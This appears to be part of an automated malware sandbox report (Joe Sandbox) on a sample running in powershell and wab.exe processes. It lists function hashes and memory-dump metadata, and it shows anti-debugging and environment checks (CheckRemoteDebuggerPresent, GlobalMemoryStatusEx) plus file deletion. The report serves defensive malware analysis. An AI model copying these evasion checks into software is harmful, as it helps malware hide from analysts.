                                                                            • Instruction Fuzzy Hash: 0E0249B4A002189FEB24DB14C950BEDB7B2BF85304F2485EAD9096F781DB759E81CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0750925B Relevance: 2.9, Strings: 2, Instructions: 387COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1837459935.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7500000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (fl$(fl
                                                                            • API String ID: 0-1194790885
                                                                            • Opcode ID: 7a279507be58c996659be2ecd4cec37a66e3d8083f98f9a8c3b743500604ec2f
                                                                            • Instruction ID: 27bed334f437e7c85dd21b48affb96414fb8c2935a15b74891e5e8eece18247d
                                                                            • Opcode Fuzzy Hash: 7a279507be58c996659be2ecd4cec37a66e3d8083f98f9a8c3b743500604ec2f
                                                                            • Instruction Fuzzy Hash: F5F19FB4A00215DFEB24DB58C954B9AB7B3BF84300F10C4AAD5096F796DB71ED818FA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 075084A0 Relevance: 2.7, Strings: 2, Instructions: 247COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1837459935.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7500000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (fl$(fl
                                                                            • API String ID: 0-1194790885
                                                                            • Opcode ID: ba2b0b876743fb39cfdb104d2e4f4ead0447b7a563ab28d39bd654181f9efc31
                                                                            • Instruction ID: 032cb3a80105b3441467108660b6afbe66104f82efce6f4197239a8a93cb52f1
                                                                            • Opcode Fuzzy Hash: ba2b0b876743fb39cfdb104d2e4f4ead0447b7a563ab28d39bd654181f9efc31
                                                                            • Instruction Fuzzy Hash: 98917CB4B002049BE724DB58C555FEEB7B2AB89314F218469E5056F790DB72EC41CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0750847A Relevance: 1.5, Strings: 1, Instructions: 259COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1837459935.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7500000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (fl
                                                                            • API String ID: 0-423539152
                                                                            • Opcode ID: 2f7fd350d719b68359db8d6ae564741b2f98b4e9668cc9aa731208280aa552a6
                                                                            • Instruction ID: 6f436b6e60b3d77c687be0f4af81793aa4206e389f8cdbe7defc2150008cc341
                                                                            • Opcode Fuzzy Hash: 2f7fd350d719b68359db8d6ae564741b2f98b4e9668cc9aa731208280aa552a6
                                                                            • Instruction Fuzzy Hash: 76A1ACB4A00200DFE724DB58C594FDAB7B2BF89314F21846AE5056F791DB76EC81CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07500638 Relevance: .5, Instructions: 495COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1837459935.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7500000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 72081526d7f4a56ca22940d22a6f0c31425ff6673f868ff7e7743b16ab1083d4
                                                                            • Instruction ID: e771e0095525698bb672e37f745bf4fa917e5319d25eaaeb45300ba411407308
                                                                            • Opcode Fuzzy Hash: 72081526d7f4a56ca22940d22a6f0c31425ff6673f868ff7e7743b16ab1083d4
                                                                            • Instruction Fuzzy Hash: A1F104B1704356DFEB258B68D8107AABBB2FFC6211F28846BD449CB2D1DA35C841C7E1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07505BC0 Relevance: .4, Instructions: 447COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1837459935.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7500000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 49907a3ac73aeb62f7452efeeb95c8082f99dc748d4a88d745d98930c8e7a5ae
                                                                            • Instruction ID: fa2f86775cca3d8b03a339da414c6389af9919d5387f814181420270de1803c3
                                                                            • Opcode Fuzzy Hash: 49907a3ac73aeb62f7452efeeb95c8082f99dc748d4a88d745d98930c8e7a5ae
                                                                            • Instruction Fuzzy Hash: E4E116B1704346CFDB258B64C810BEABBB1FF86211F1884ABD445CB292EB35C951CBE1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0750A2E0 Relevance: .3, Instructions: 339COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1837459935.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7500000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 01b0e8a81712ec636e098dc290d28444a5315a40fa123d1aeb4954f0917ab846
                                                                            • Instruction ID: 493fd203054816fa87478e3be7ba06eace90b09be53f82418217ef8acb34cbed
                                                                            • Opcode Fuzzy Hash: 01b0e8a81712ec636e098dc290d28444a5315a40fa123d1aeb4954f0917ab846
                                                                            • Instruction Fuzzy Hash: DFD15BB4B00305DBDB28DB68C455BDAB7B2BF88314F24C42AD5056F791DB75E842CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0750A2C2 Relevance: .3, Instructions: 269COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1837459935.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7500000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1699e92a3f42d49b38199548858dc19565af7673ee9c9b66101749f571dc6cf0
                                                                            • Instruction ID: 34aacc4a8836f8addcf0eaddf0003e21ee6de4f0d0f1eda09e55e4c41c0cedcf
                                                                            • Opcode Fuzzy Hash: 1699e92a3f42d49b38199548858dc19565af7673ee9c9b66101749f571dc6cf0
                                                                            • Instruction Fuzzy Hash: 7BB1ABB4A00305DFDB24DB68C554BDABBB2BF88314F24C41AD9056F391DB75E882CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07502BF8 Relevance: .3, Instructions: 266COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1837459935.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7500000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7b89cb8135ef1fff9acbff8afccfed411b21fa03fbbade58cf138c912bfa211c
                                                                            • Instruction ID: a1708bd21dc370122fa7506395d3d24ac9beb0bd1f28911fb9c73f54819dd576
                                                                            • Opcode Fuzzy Hash: 7b89cb8135ef1fff9acbff8afccfed411b21fa03fbbade58cf138c912bfa211c
                                                                            • Instruction Fuzzy Hash: A091E6F2B00202DFDB259A68840A7EA77A2BF85250F24846BD905CF7D1EB35DD41CBE1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07506244 Relevance: .1, Instructions: 136COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1837459935.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7500000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6f8373b025f4040f668d9fdfe9319b11458faf47e0e6b1bd53304ef20aa9a5e6
                                                                            • Instruction ID: 283f0d256f44f753a06f64edf1e42a225dc91f5d3fd29573d8219eac68821105
                                                                            • Opcode Fuzzy Hash: 6f8373b025f4040f668d9fdfe9319b11458faf47e0e6b1bd53304ef20aa9a5e6
                                                                            • Instruction Fuzzy Hash: C9418BB424A3C29FD7168B708851A96BFB1FF83200B1D84DBD485CF1E3C666D956CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07502BDC Relevance: .1, Instructions: 123COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1837459935.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7500000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 90fdc4f91db42e7c313c7f4cc5ca1fe0f280b486f2a4dc9c522787ffbbc7c43e
                                                                            • Instruction ID: 57467728daf56e6bb628c49af78aa5f57ced2cbc52d8907db1f2ebb98b0fbe7b
                                                                            • Opcode Fuzzy Hash: 90fdc4f91db42e7c313c7f4cc5ca1fe0f280b486f2a4dc9c522787ffbbc7c43e
                                                                            • Instruction Fuzzy Hash: A441D3F2A00202DFDB249A2485496EA77B2BF85254F2484A7D904DF395E735DD82CBF1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 075008C4 Relevance: .1, Instructions: 92COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1837459935.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7500000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 180a2f025263379feea411709fb7ca33f67b2c2471c03c0114fa2a7427ef1bc0
                                                                            • Instruction ID: 6d1507d404916c0d57c082e73dd2303849bd1c16346eaa2e4ff3e30c0c410ea2
                                                                            • Opcode Fuzzy Hash: 180a2f025263379feea411709fb7ca33f67b2c2471c03c0114fa2a7427ef1bc0
                                                                            • Instruction Fuzzy Hash: 5931D6F5A00206DFEB208E65C5407EA7BB5BF96351F15886BD80C9B2D1D735C851CBE2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 07509B98 Relevance: 6.5, Strings: 5, Instructions: 266COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1837459935.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7500000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (fl$(fl$(fl$(fl$H:t
                                                                            • API String ID: 0-277600028
                                                                            • Opcode ID: 1889947e5ae20b1c66abfbabdbf30ba749e4c7f294d9262f3b103245e9a93a0d
                                                                            • Instruction ID: e1a12afb96d084cde6450cb6e02ded0566bd9c0d45e2a1d40fdf7763583d2004
                                                                            • Opcode Fuzzy Hash: 1889947e5ae20b1c66abfbabdbf30ba749e4c7f294d9262f3b103245e9a93a0d
                                                                            • Instruction Fuzzy Hash: 67A18DB5E00601DFDB34CF54C481AAAB7B2BF85714F14882ED95A6B78AD731B842CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0750BAC0 Relevance: 5.5, Strings: 4, Instructions: 497COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1837459935.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7500000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Hwt$Hwt$p{t$p{t
                                                                            • API String ID: 0-3668832146
                                                                            • Opcode ID: 4b74134f81a4462fb80125bfdb2030135ab988eaaee9b5db690999e7e45d0140
                                                                            • Instruction ID: c586cbda2461cf6b9e8f6247edd4979ee1770bc1f281da5955cff7f5b5a9d10c
                                                                            • Opcode Fuzzy Hash: 4b74134f81a4462fb80125bfdb2030135ab988eaaee9b5db690999e7e45d0140
                                                                            • Instruction Fuzzy Hash: 75F1F1F1704306DFDB259F68CC94BEABBA2BF86211F14846BE5058B2D1DB71D841CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07500DE0 Relevance: 5.5, Strings: 4, Instructions: 493COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1837459935.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7500000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (fl$(fl$(fl$(fl
                                                                            • API String ID: 0-2123353879
                                                                            • Opcode ID: cbb37c336a1370911b87b91f957e0fa875873abd4f88f3420be6d0d9fa18b9f3
                                                                            • Instruction ID: ed52f132d66fde0030b49da0bd523ad20ecd4937eaaef95eb9a5675b852a4207
                                                                            • Opcode Fuzzy Hash: cbb37c336a1370911b87b91f957e0fa875873abd4f88f3420be6d0d9fa18b9f3
                                                                            • Instruction Fuzzy Hash: DF127EB4B01209DFD724CB98C591B9EB7F2BB89310F24C15AE9099F791DA71EC41CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0750CA35 Relevance: 5.3, Strings: 4, Instructions: 285COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1837459935.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7500000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 84l$84l$84l$84l
                                                                            • API String ID: 0-3024328185
                                                                            • Opcode ID: e4e6240cb1f73a8a7c706fa7e465b05446795d2997baccfb43b245d7993ac6c1
                                                                            • Instruction ID: 220ac119aac2388e2f1ddf7c200a94f7cd98aca937c971b4906d7295d4d6423a
                                                                            • Opcode Fuzzy Hash: e4e6240cb1f73a8a7c706fa7e465b05446795d2997baccfb43b245d7993ac6c1
                                                                            • Instruction Fuzzy Hash: 51A1B7B1710206DFDB25DB94C8447EAB7A2BF8A211F248A56E905AF3C1DA71DC41CBF1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0750A020 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1837459935.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7500000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (fl$(fl$(fl$(fl
                                                                            • API String ID: 0-2123353879
                                                                            • Opcode ID: 7b76461611144a9dac0a2b3b6a91c52adde88eb7c9a59dbf46fcd9af573ac49f
                                                                            • Instruction ID: 42913f7ca3a81b6955e9b6ecef79f25677d79f3e0ea0f6a42debf8871fd398db
                                                                            • Opcode Fuzzy Hash: 7b76461611144a9dac0a2b3b6a91c52adde88eb7c9a59dbf46fcd9af573ac49f
                                                                            • Instruction Fuzzy Hash: 1A716FB4A00305DFD724DBA8C451BEAB7B2BF89214F24C16AD905AB791DB72EC41CBD1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Execution Graph

                                                                            Execution Coverage:10.9%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:16.7%
                                                                            Total number of Nodes:18
                                                                            Total number of Limit Nodes:1
                                                                            execution_graph 9364 21c70b8 9365 21c70fc CheckRemoteDebuggerPresent 9364->9365 9366 21c713e 9365->9366 9367 21c8438 9368 21c847e DeleteFileW 9367->9368 9370 21c84b7 9368->9370 9371 21cf3e8 9374 21cf41a 9371->9374 9372 21cf3f6 9375 21cf42d 9374->9375 9376 21cf455 9374->9376 9375->9372 9380 21cf4f8 9376->9380 9383 21cf4f2 9376->9383 9377 21cf472 9377->9372 9381 21cf53e GlobalMemoryStatusEx 9380->9381 9382 21cf56e 9381->9382 9382->9377 9384 21cf53e GlobalMemoryStatusEx 9383->9384 9385 21cf56e 9384->9385 9385->9377

                                                                            Executed Functions

                                                                            Function 021C70B8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 446 21c70b8-21c713c CheckRemoteDebuggerPresent 448 21c713e-21c7144 446->448 449 21c7145-21c7180 446->449 448->449
                                                                            APIs
                                                                            • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 021C712F
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2566051486.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_21c0000_wab.jbxd
                                                                            Similarity
                                                                            • API ID: CheckDebuggerPresentRemote
                                                                            • String ID:
                                                                            • API String ID: 3662101638-0
                                                                            • Opcode ID: a56cf520269821fea0466993a92c39fc18a9e74ef2b7568d42f9ea5cd167a5f0
                                                                            • Instruction ID: f101fa9955387316fecea164ae977cf8d8294d5b3516c5ed901e4761a6ecf2cd
                                                                            • Opcode Fuzzy Hash: a56cf520269821fea0466993a92c39fc18a9e74ef2b7568d42f9ea5cd167a5f0
                                                                            • Instruction Fuzzy Hash: 1D2159B59002598FDB00CF9AD444BEEFBF4AF49310F14846AE454B7340D378A944CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 021C70B7 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 440 21c70b7-21c713c CheckRemoteDebuggerPresent 442 21c713e-21c7144 440->442 443 21c7145-21c7180 440->443 442->443
                                                                            APIs
                                                                            • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 021C712F
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2566051486.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_21c0000_wab.jbxd
                                                                            Similarity
                                                                            • API ID: CheckDebuggerPresentRemote
                                                                            • String ID:
                                                                            • API String ID: 3662101638-0
                                                                            • Opcode ID: b0892c8f3efdec4a101a86ff7a68cdd372c2f6dba63c035e90885e24d0e35fed
                                                                            • Instruction ID: 1d56b79881f1e3d7eb2d2183b5a71acff34276f004046a5b30fdf5e89e2d541a
                                                                            • Opcode Fuzzy Hash: b0892c8f3efdec4a101a86ff7a68cdd372c2f6dba63c035e90885e24d0e35fed
                                                                            • Instruction Fuzzy Hash: 682136B59002598FDB10CFA9D444BEEFBF4AF49310F14846AE455A7350D378A944CF61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 021C8434 Relevance: 1.6, APIs: 1, Instructions: 58fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 452 21c8434-21c8482 454 21c848a-21c84b5 DeleteFileW 452->454 455 21c8484-21c8487 452->455 456 21c84be-21c84e6 454->456 457 21c84b7-21c84bd 454->457 455->454 457->456
                                                                            APIs
                                                                            • DeleteFileW.KERNEL32(00000000), ref: 021C84A8
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2566051486.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_21c0000_wab.jbxd
                                                                            Similarity
                                                                            • API ID: DeleteFile
                                                                            • String ID:
                                                                            • API String ID: 4033686569-0
                                                                            • Opcode ID: 439d2eccc27e86bbda9b2d442581fd3de48c4be024c2f667ab9edfce74277653
                                                                            • Instruction ID: f713c4858349644db26f8558f5ea56aecbdf2535b9f8a7ff2c88bbe0d043df3f
                                                                            • Opcode Fuzzy Hash: 439d2eccc27e86bbda9b2d442581fd3de48c4be024c2f667ab9edfce74277653
                                                                            • Instruction Fuzzy Hash: 122133B6D1061A8FCB10CF9AD544BEEFBB0AF48320F15812AD818A7640D378A900CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 021C8438 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 460 21c8438-21c8482 462 21c848a-21c84b5 DeleteFileW 460->462 463 21c8484-21c8487 460->463 464 21c84be-21c84e6 462->464 465 21c84b7-21c84bd 462->465 463->462 465->464
                                                                            APIs
                                                                            • DeleteFileW.KERNEL32(00000000), ref: 021C84A8
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2566051486.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_21c0000_wab.jbxd
                                                                            Similarity
                                                                            • API ID: DeleteFile
                                                                            • String ID:
                                                                            • API String ID: 4033686569-0
                                                                            • Opcode ID: 9e78e5af74685a3111282e962fc7e729c16d395b01bfc91ae7c414b6452e3a5f
                                                                            • Instruction ID: a2887edf2decbeb31376e09c53ebd73d0bfe485b17418193fe66fe3e95ad6159
                                                                            • Opcode Fuzzy Hash: 9e78e5af74685a3111282e962fc7e729c16d395b01bfc91ae7c414b6452e3a5f
                                                                            • Instruction Fuzzy Hash: 261133B6C0061A9BCB10CF9AD544BEEFBF4EF48320F15816AD818B7640D378A944CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 021CF4F2 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 468 21cf4f2-21cf56c GlobalMemoryStatusEx 470 21cf56e-21cf574 468->470 471 21cf575-21cf59d 468->471 470->471
                                                                            APIs
                                                                            • GlobalMemoryStatusEx.KERNEL32 ref: 021CF55F
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2566051486.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_21c0000_wab.jbxd
                                                                            Similarity
                                                                            • API ID: GlobalMemoryStatus
                                                                            • String ID:
                                                                            • API String ID: 1890195054-0
                                                                            • Opcode ID: 0b58363cb3f413d71af5d1caaaba72366260c91598400d5bb4951f92d109f1a8
                                                                            • Instruction ID: bb01a9269538f2b41fcab37be3ee16ed17b60bee29270a51bd4f39427942937a
                                                                            • Opcode Fuzzy Hash: 0b58363cb3f413d71af5d1caaaba72366260c91598400d5bb4951f92d109f1a8
                                                                            • Instruction Fuzzy Hash: 5B1130B6C1065A9FDB10CFAAD5447EEFBF0AF48310F10816AD818A7640D378A9418FA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 021CF4F8 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 474 21cf4f8-21cf56c GlobalMemoryStatusEx 476 21cf56e-21cf574 474->476 477 21cf575-21cf59d 474->477 476->477
                                                                            APIs
                                                                            • GlobalMemoryStatusEx.KERNEL32 ref: 021CF55F
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2566051486.00000000021C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_21c0000_wab.jbxd
                                                                            Similarity
                                                                            • API ID: GlobalMemoryStatus
                                                                            • String ID:
                                                                            • API String ID: 1890195054-0
                                                                            • Opcode ID: 7d842a449a76b8a26cc0af82d01069bcbf2d9f1d3150a1fc2d6b46c99bca43b9
                                                                            • Instruction ID: 52621de5b11e71dca17d8871cd72c8d3bd6347663312a61f2b55720e6c651990
                                                                            • Opcode Fuzzy Hash: 7d842a449a76b8a26cc0af82d01069bcbf2d9f1d3150a1fc2d6b46c99bca43b9
                                                                            • Instruction Fuzzy Hash: 2A1112B5C0065A9BDB10CFAAD544BDEFBF4AF48320F15816AD818B7640D378A944CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0219D030 Relevance: .1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2564734805.000000000219D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0219D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_219d000_wab.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bc1b591c7f752b8eb3c6569330a8f53a8c5cf3154fc15770a6de99955782cd34
                                                                            • Instruction ID: 3ae8cd386e31cc78f1b5be149bbe60a9197abb1e41e29e36ad37aafb9851dd68
                                                                            • Opcode Fuzzy Hash: bc1b591c7f752b8eb3c6569330a8f53a8c5cf3154fc15770a6de99955782cd34
                                                                            • Instruction Fuzzy Hash: 4921F271644344DFDF14EF14E9C0B26BBA5FB88314F28C5A9D80A4B282C37AD847CB62
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0219D02B Relevance: .1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2564734805.000000000219D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0219D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_219d000_wab.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3f4675e99f22990077d7ca64c846758c7cedafdaf71502d2a3914074f32ea8d3
                                                                            • Instruction ID: 9d08b917418f6741dbca1376e614dd768d372e3c2bab035a96d0fe4c5844e14e
                                                                            • Opcode Fuzzy Hash: 3f4675e99f22990077d7ca64c846758c7cedafdaf71502d2a3914074f32ea8d3
                                                                            • Instruction Fuzzy Hash: ED11DD75544280CFCB11DF14E5C4B15FFA1FB88318F28C6AAD8494B696C33AD44ACF62
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Execution Graph

                                                                            Execution Coverage:28%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:30.4%
                                                                            Total number of Nodes:217
                                                                            Total number of Limit Nodes:4
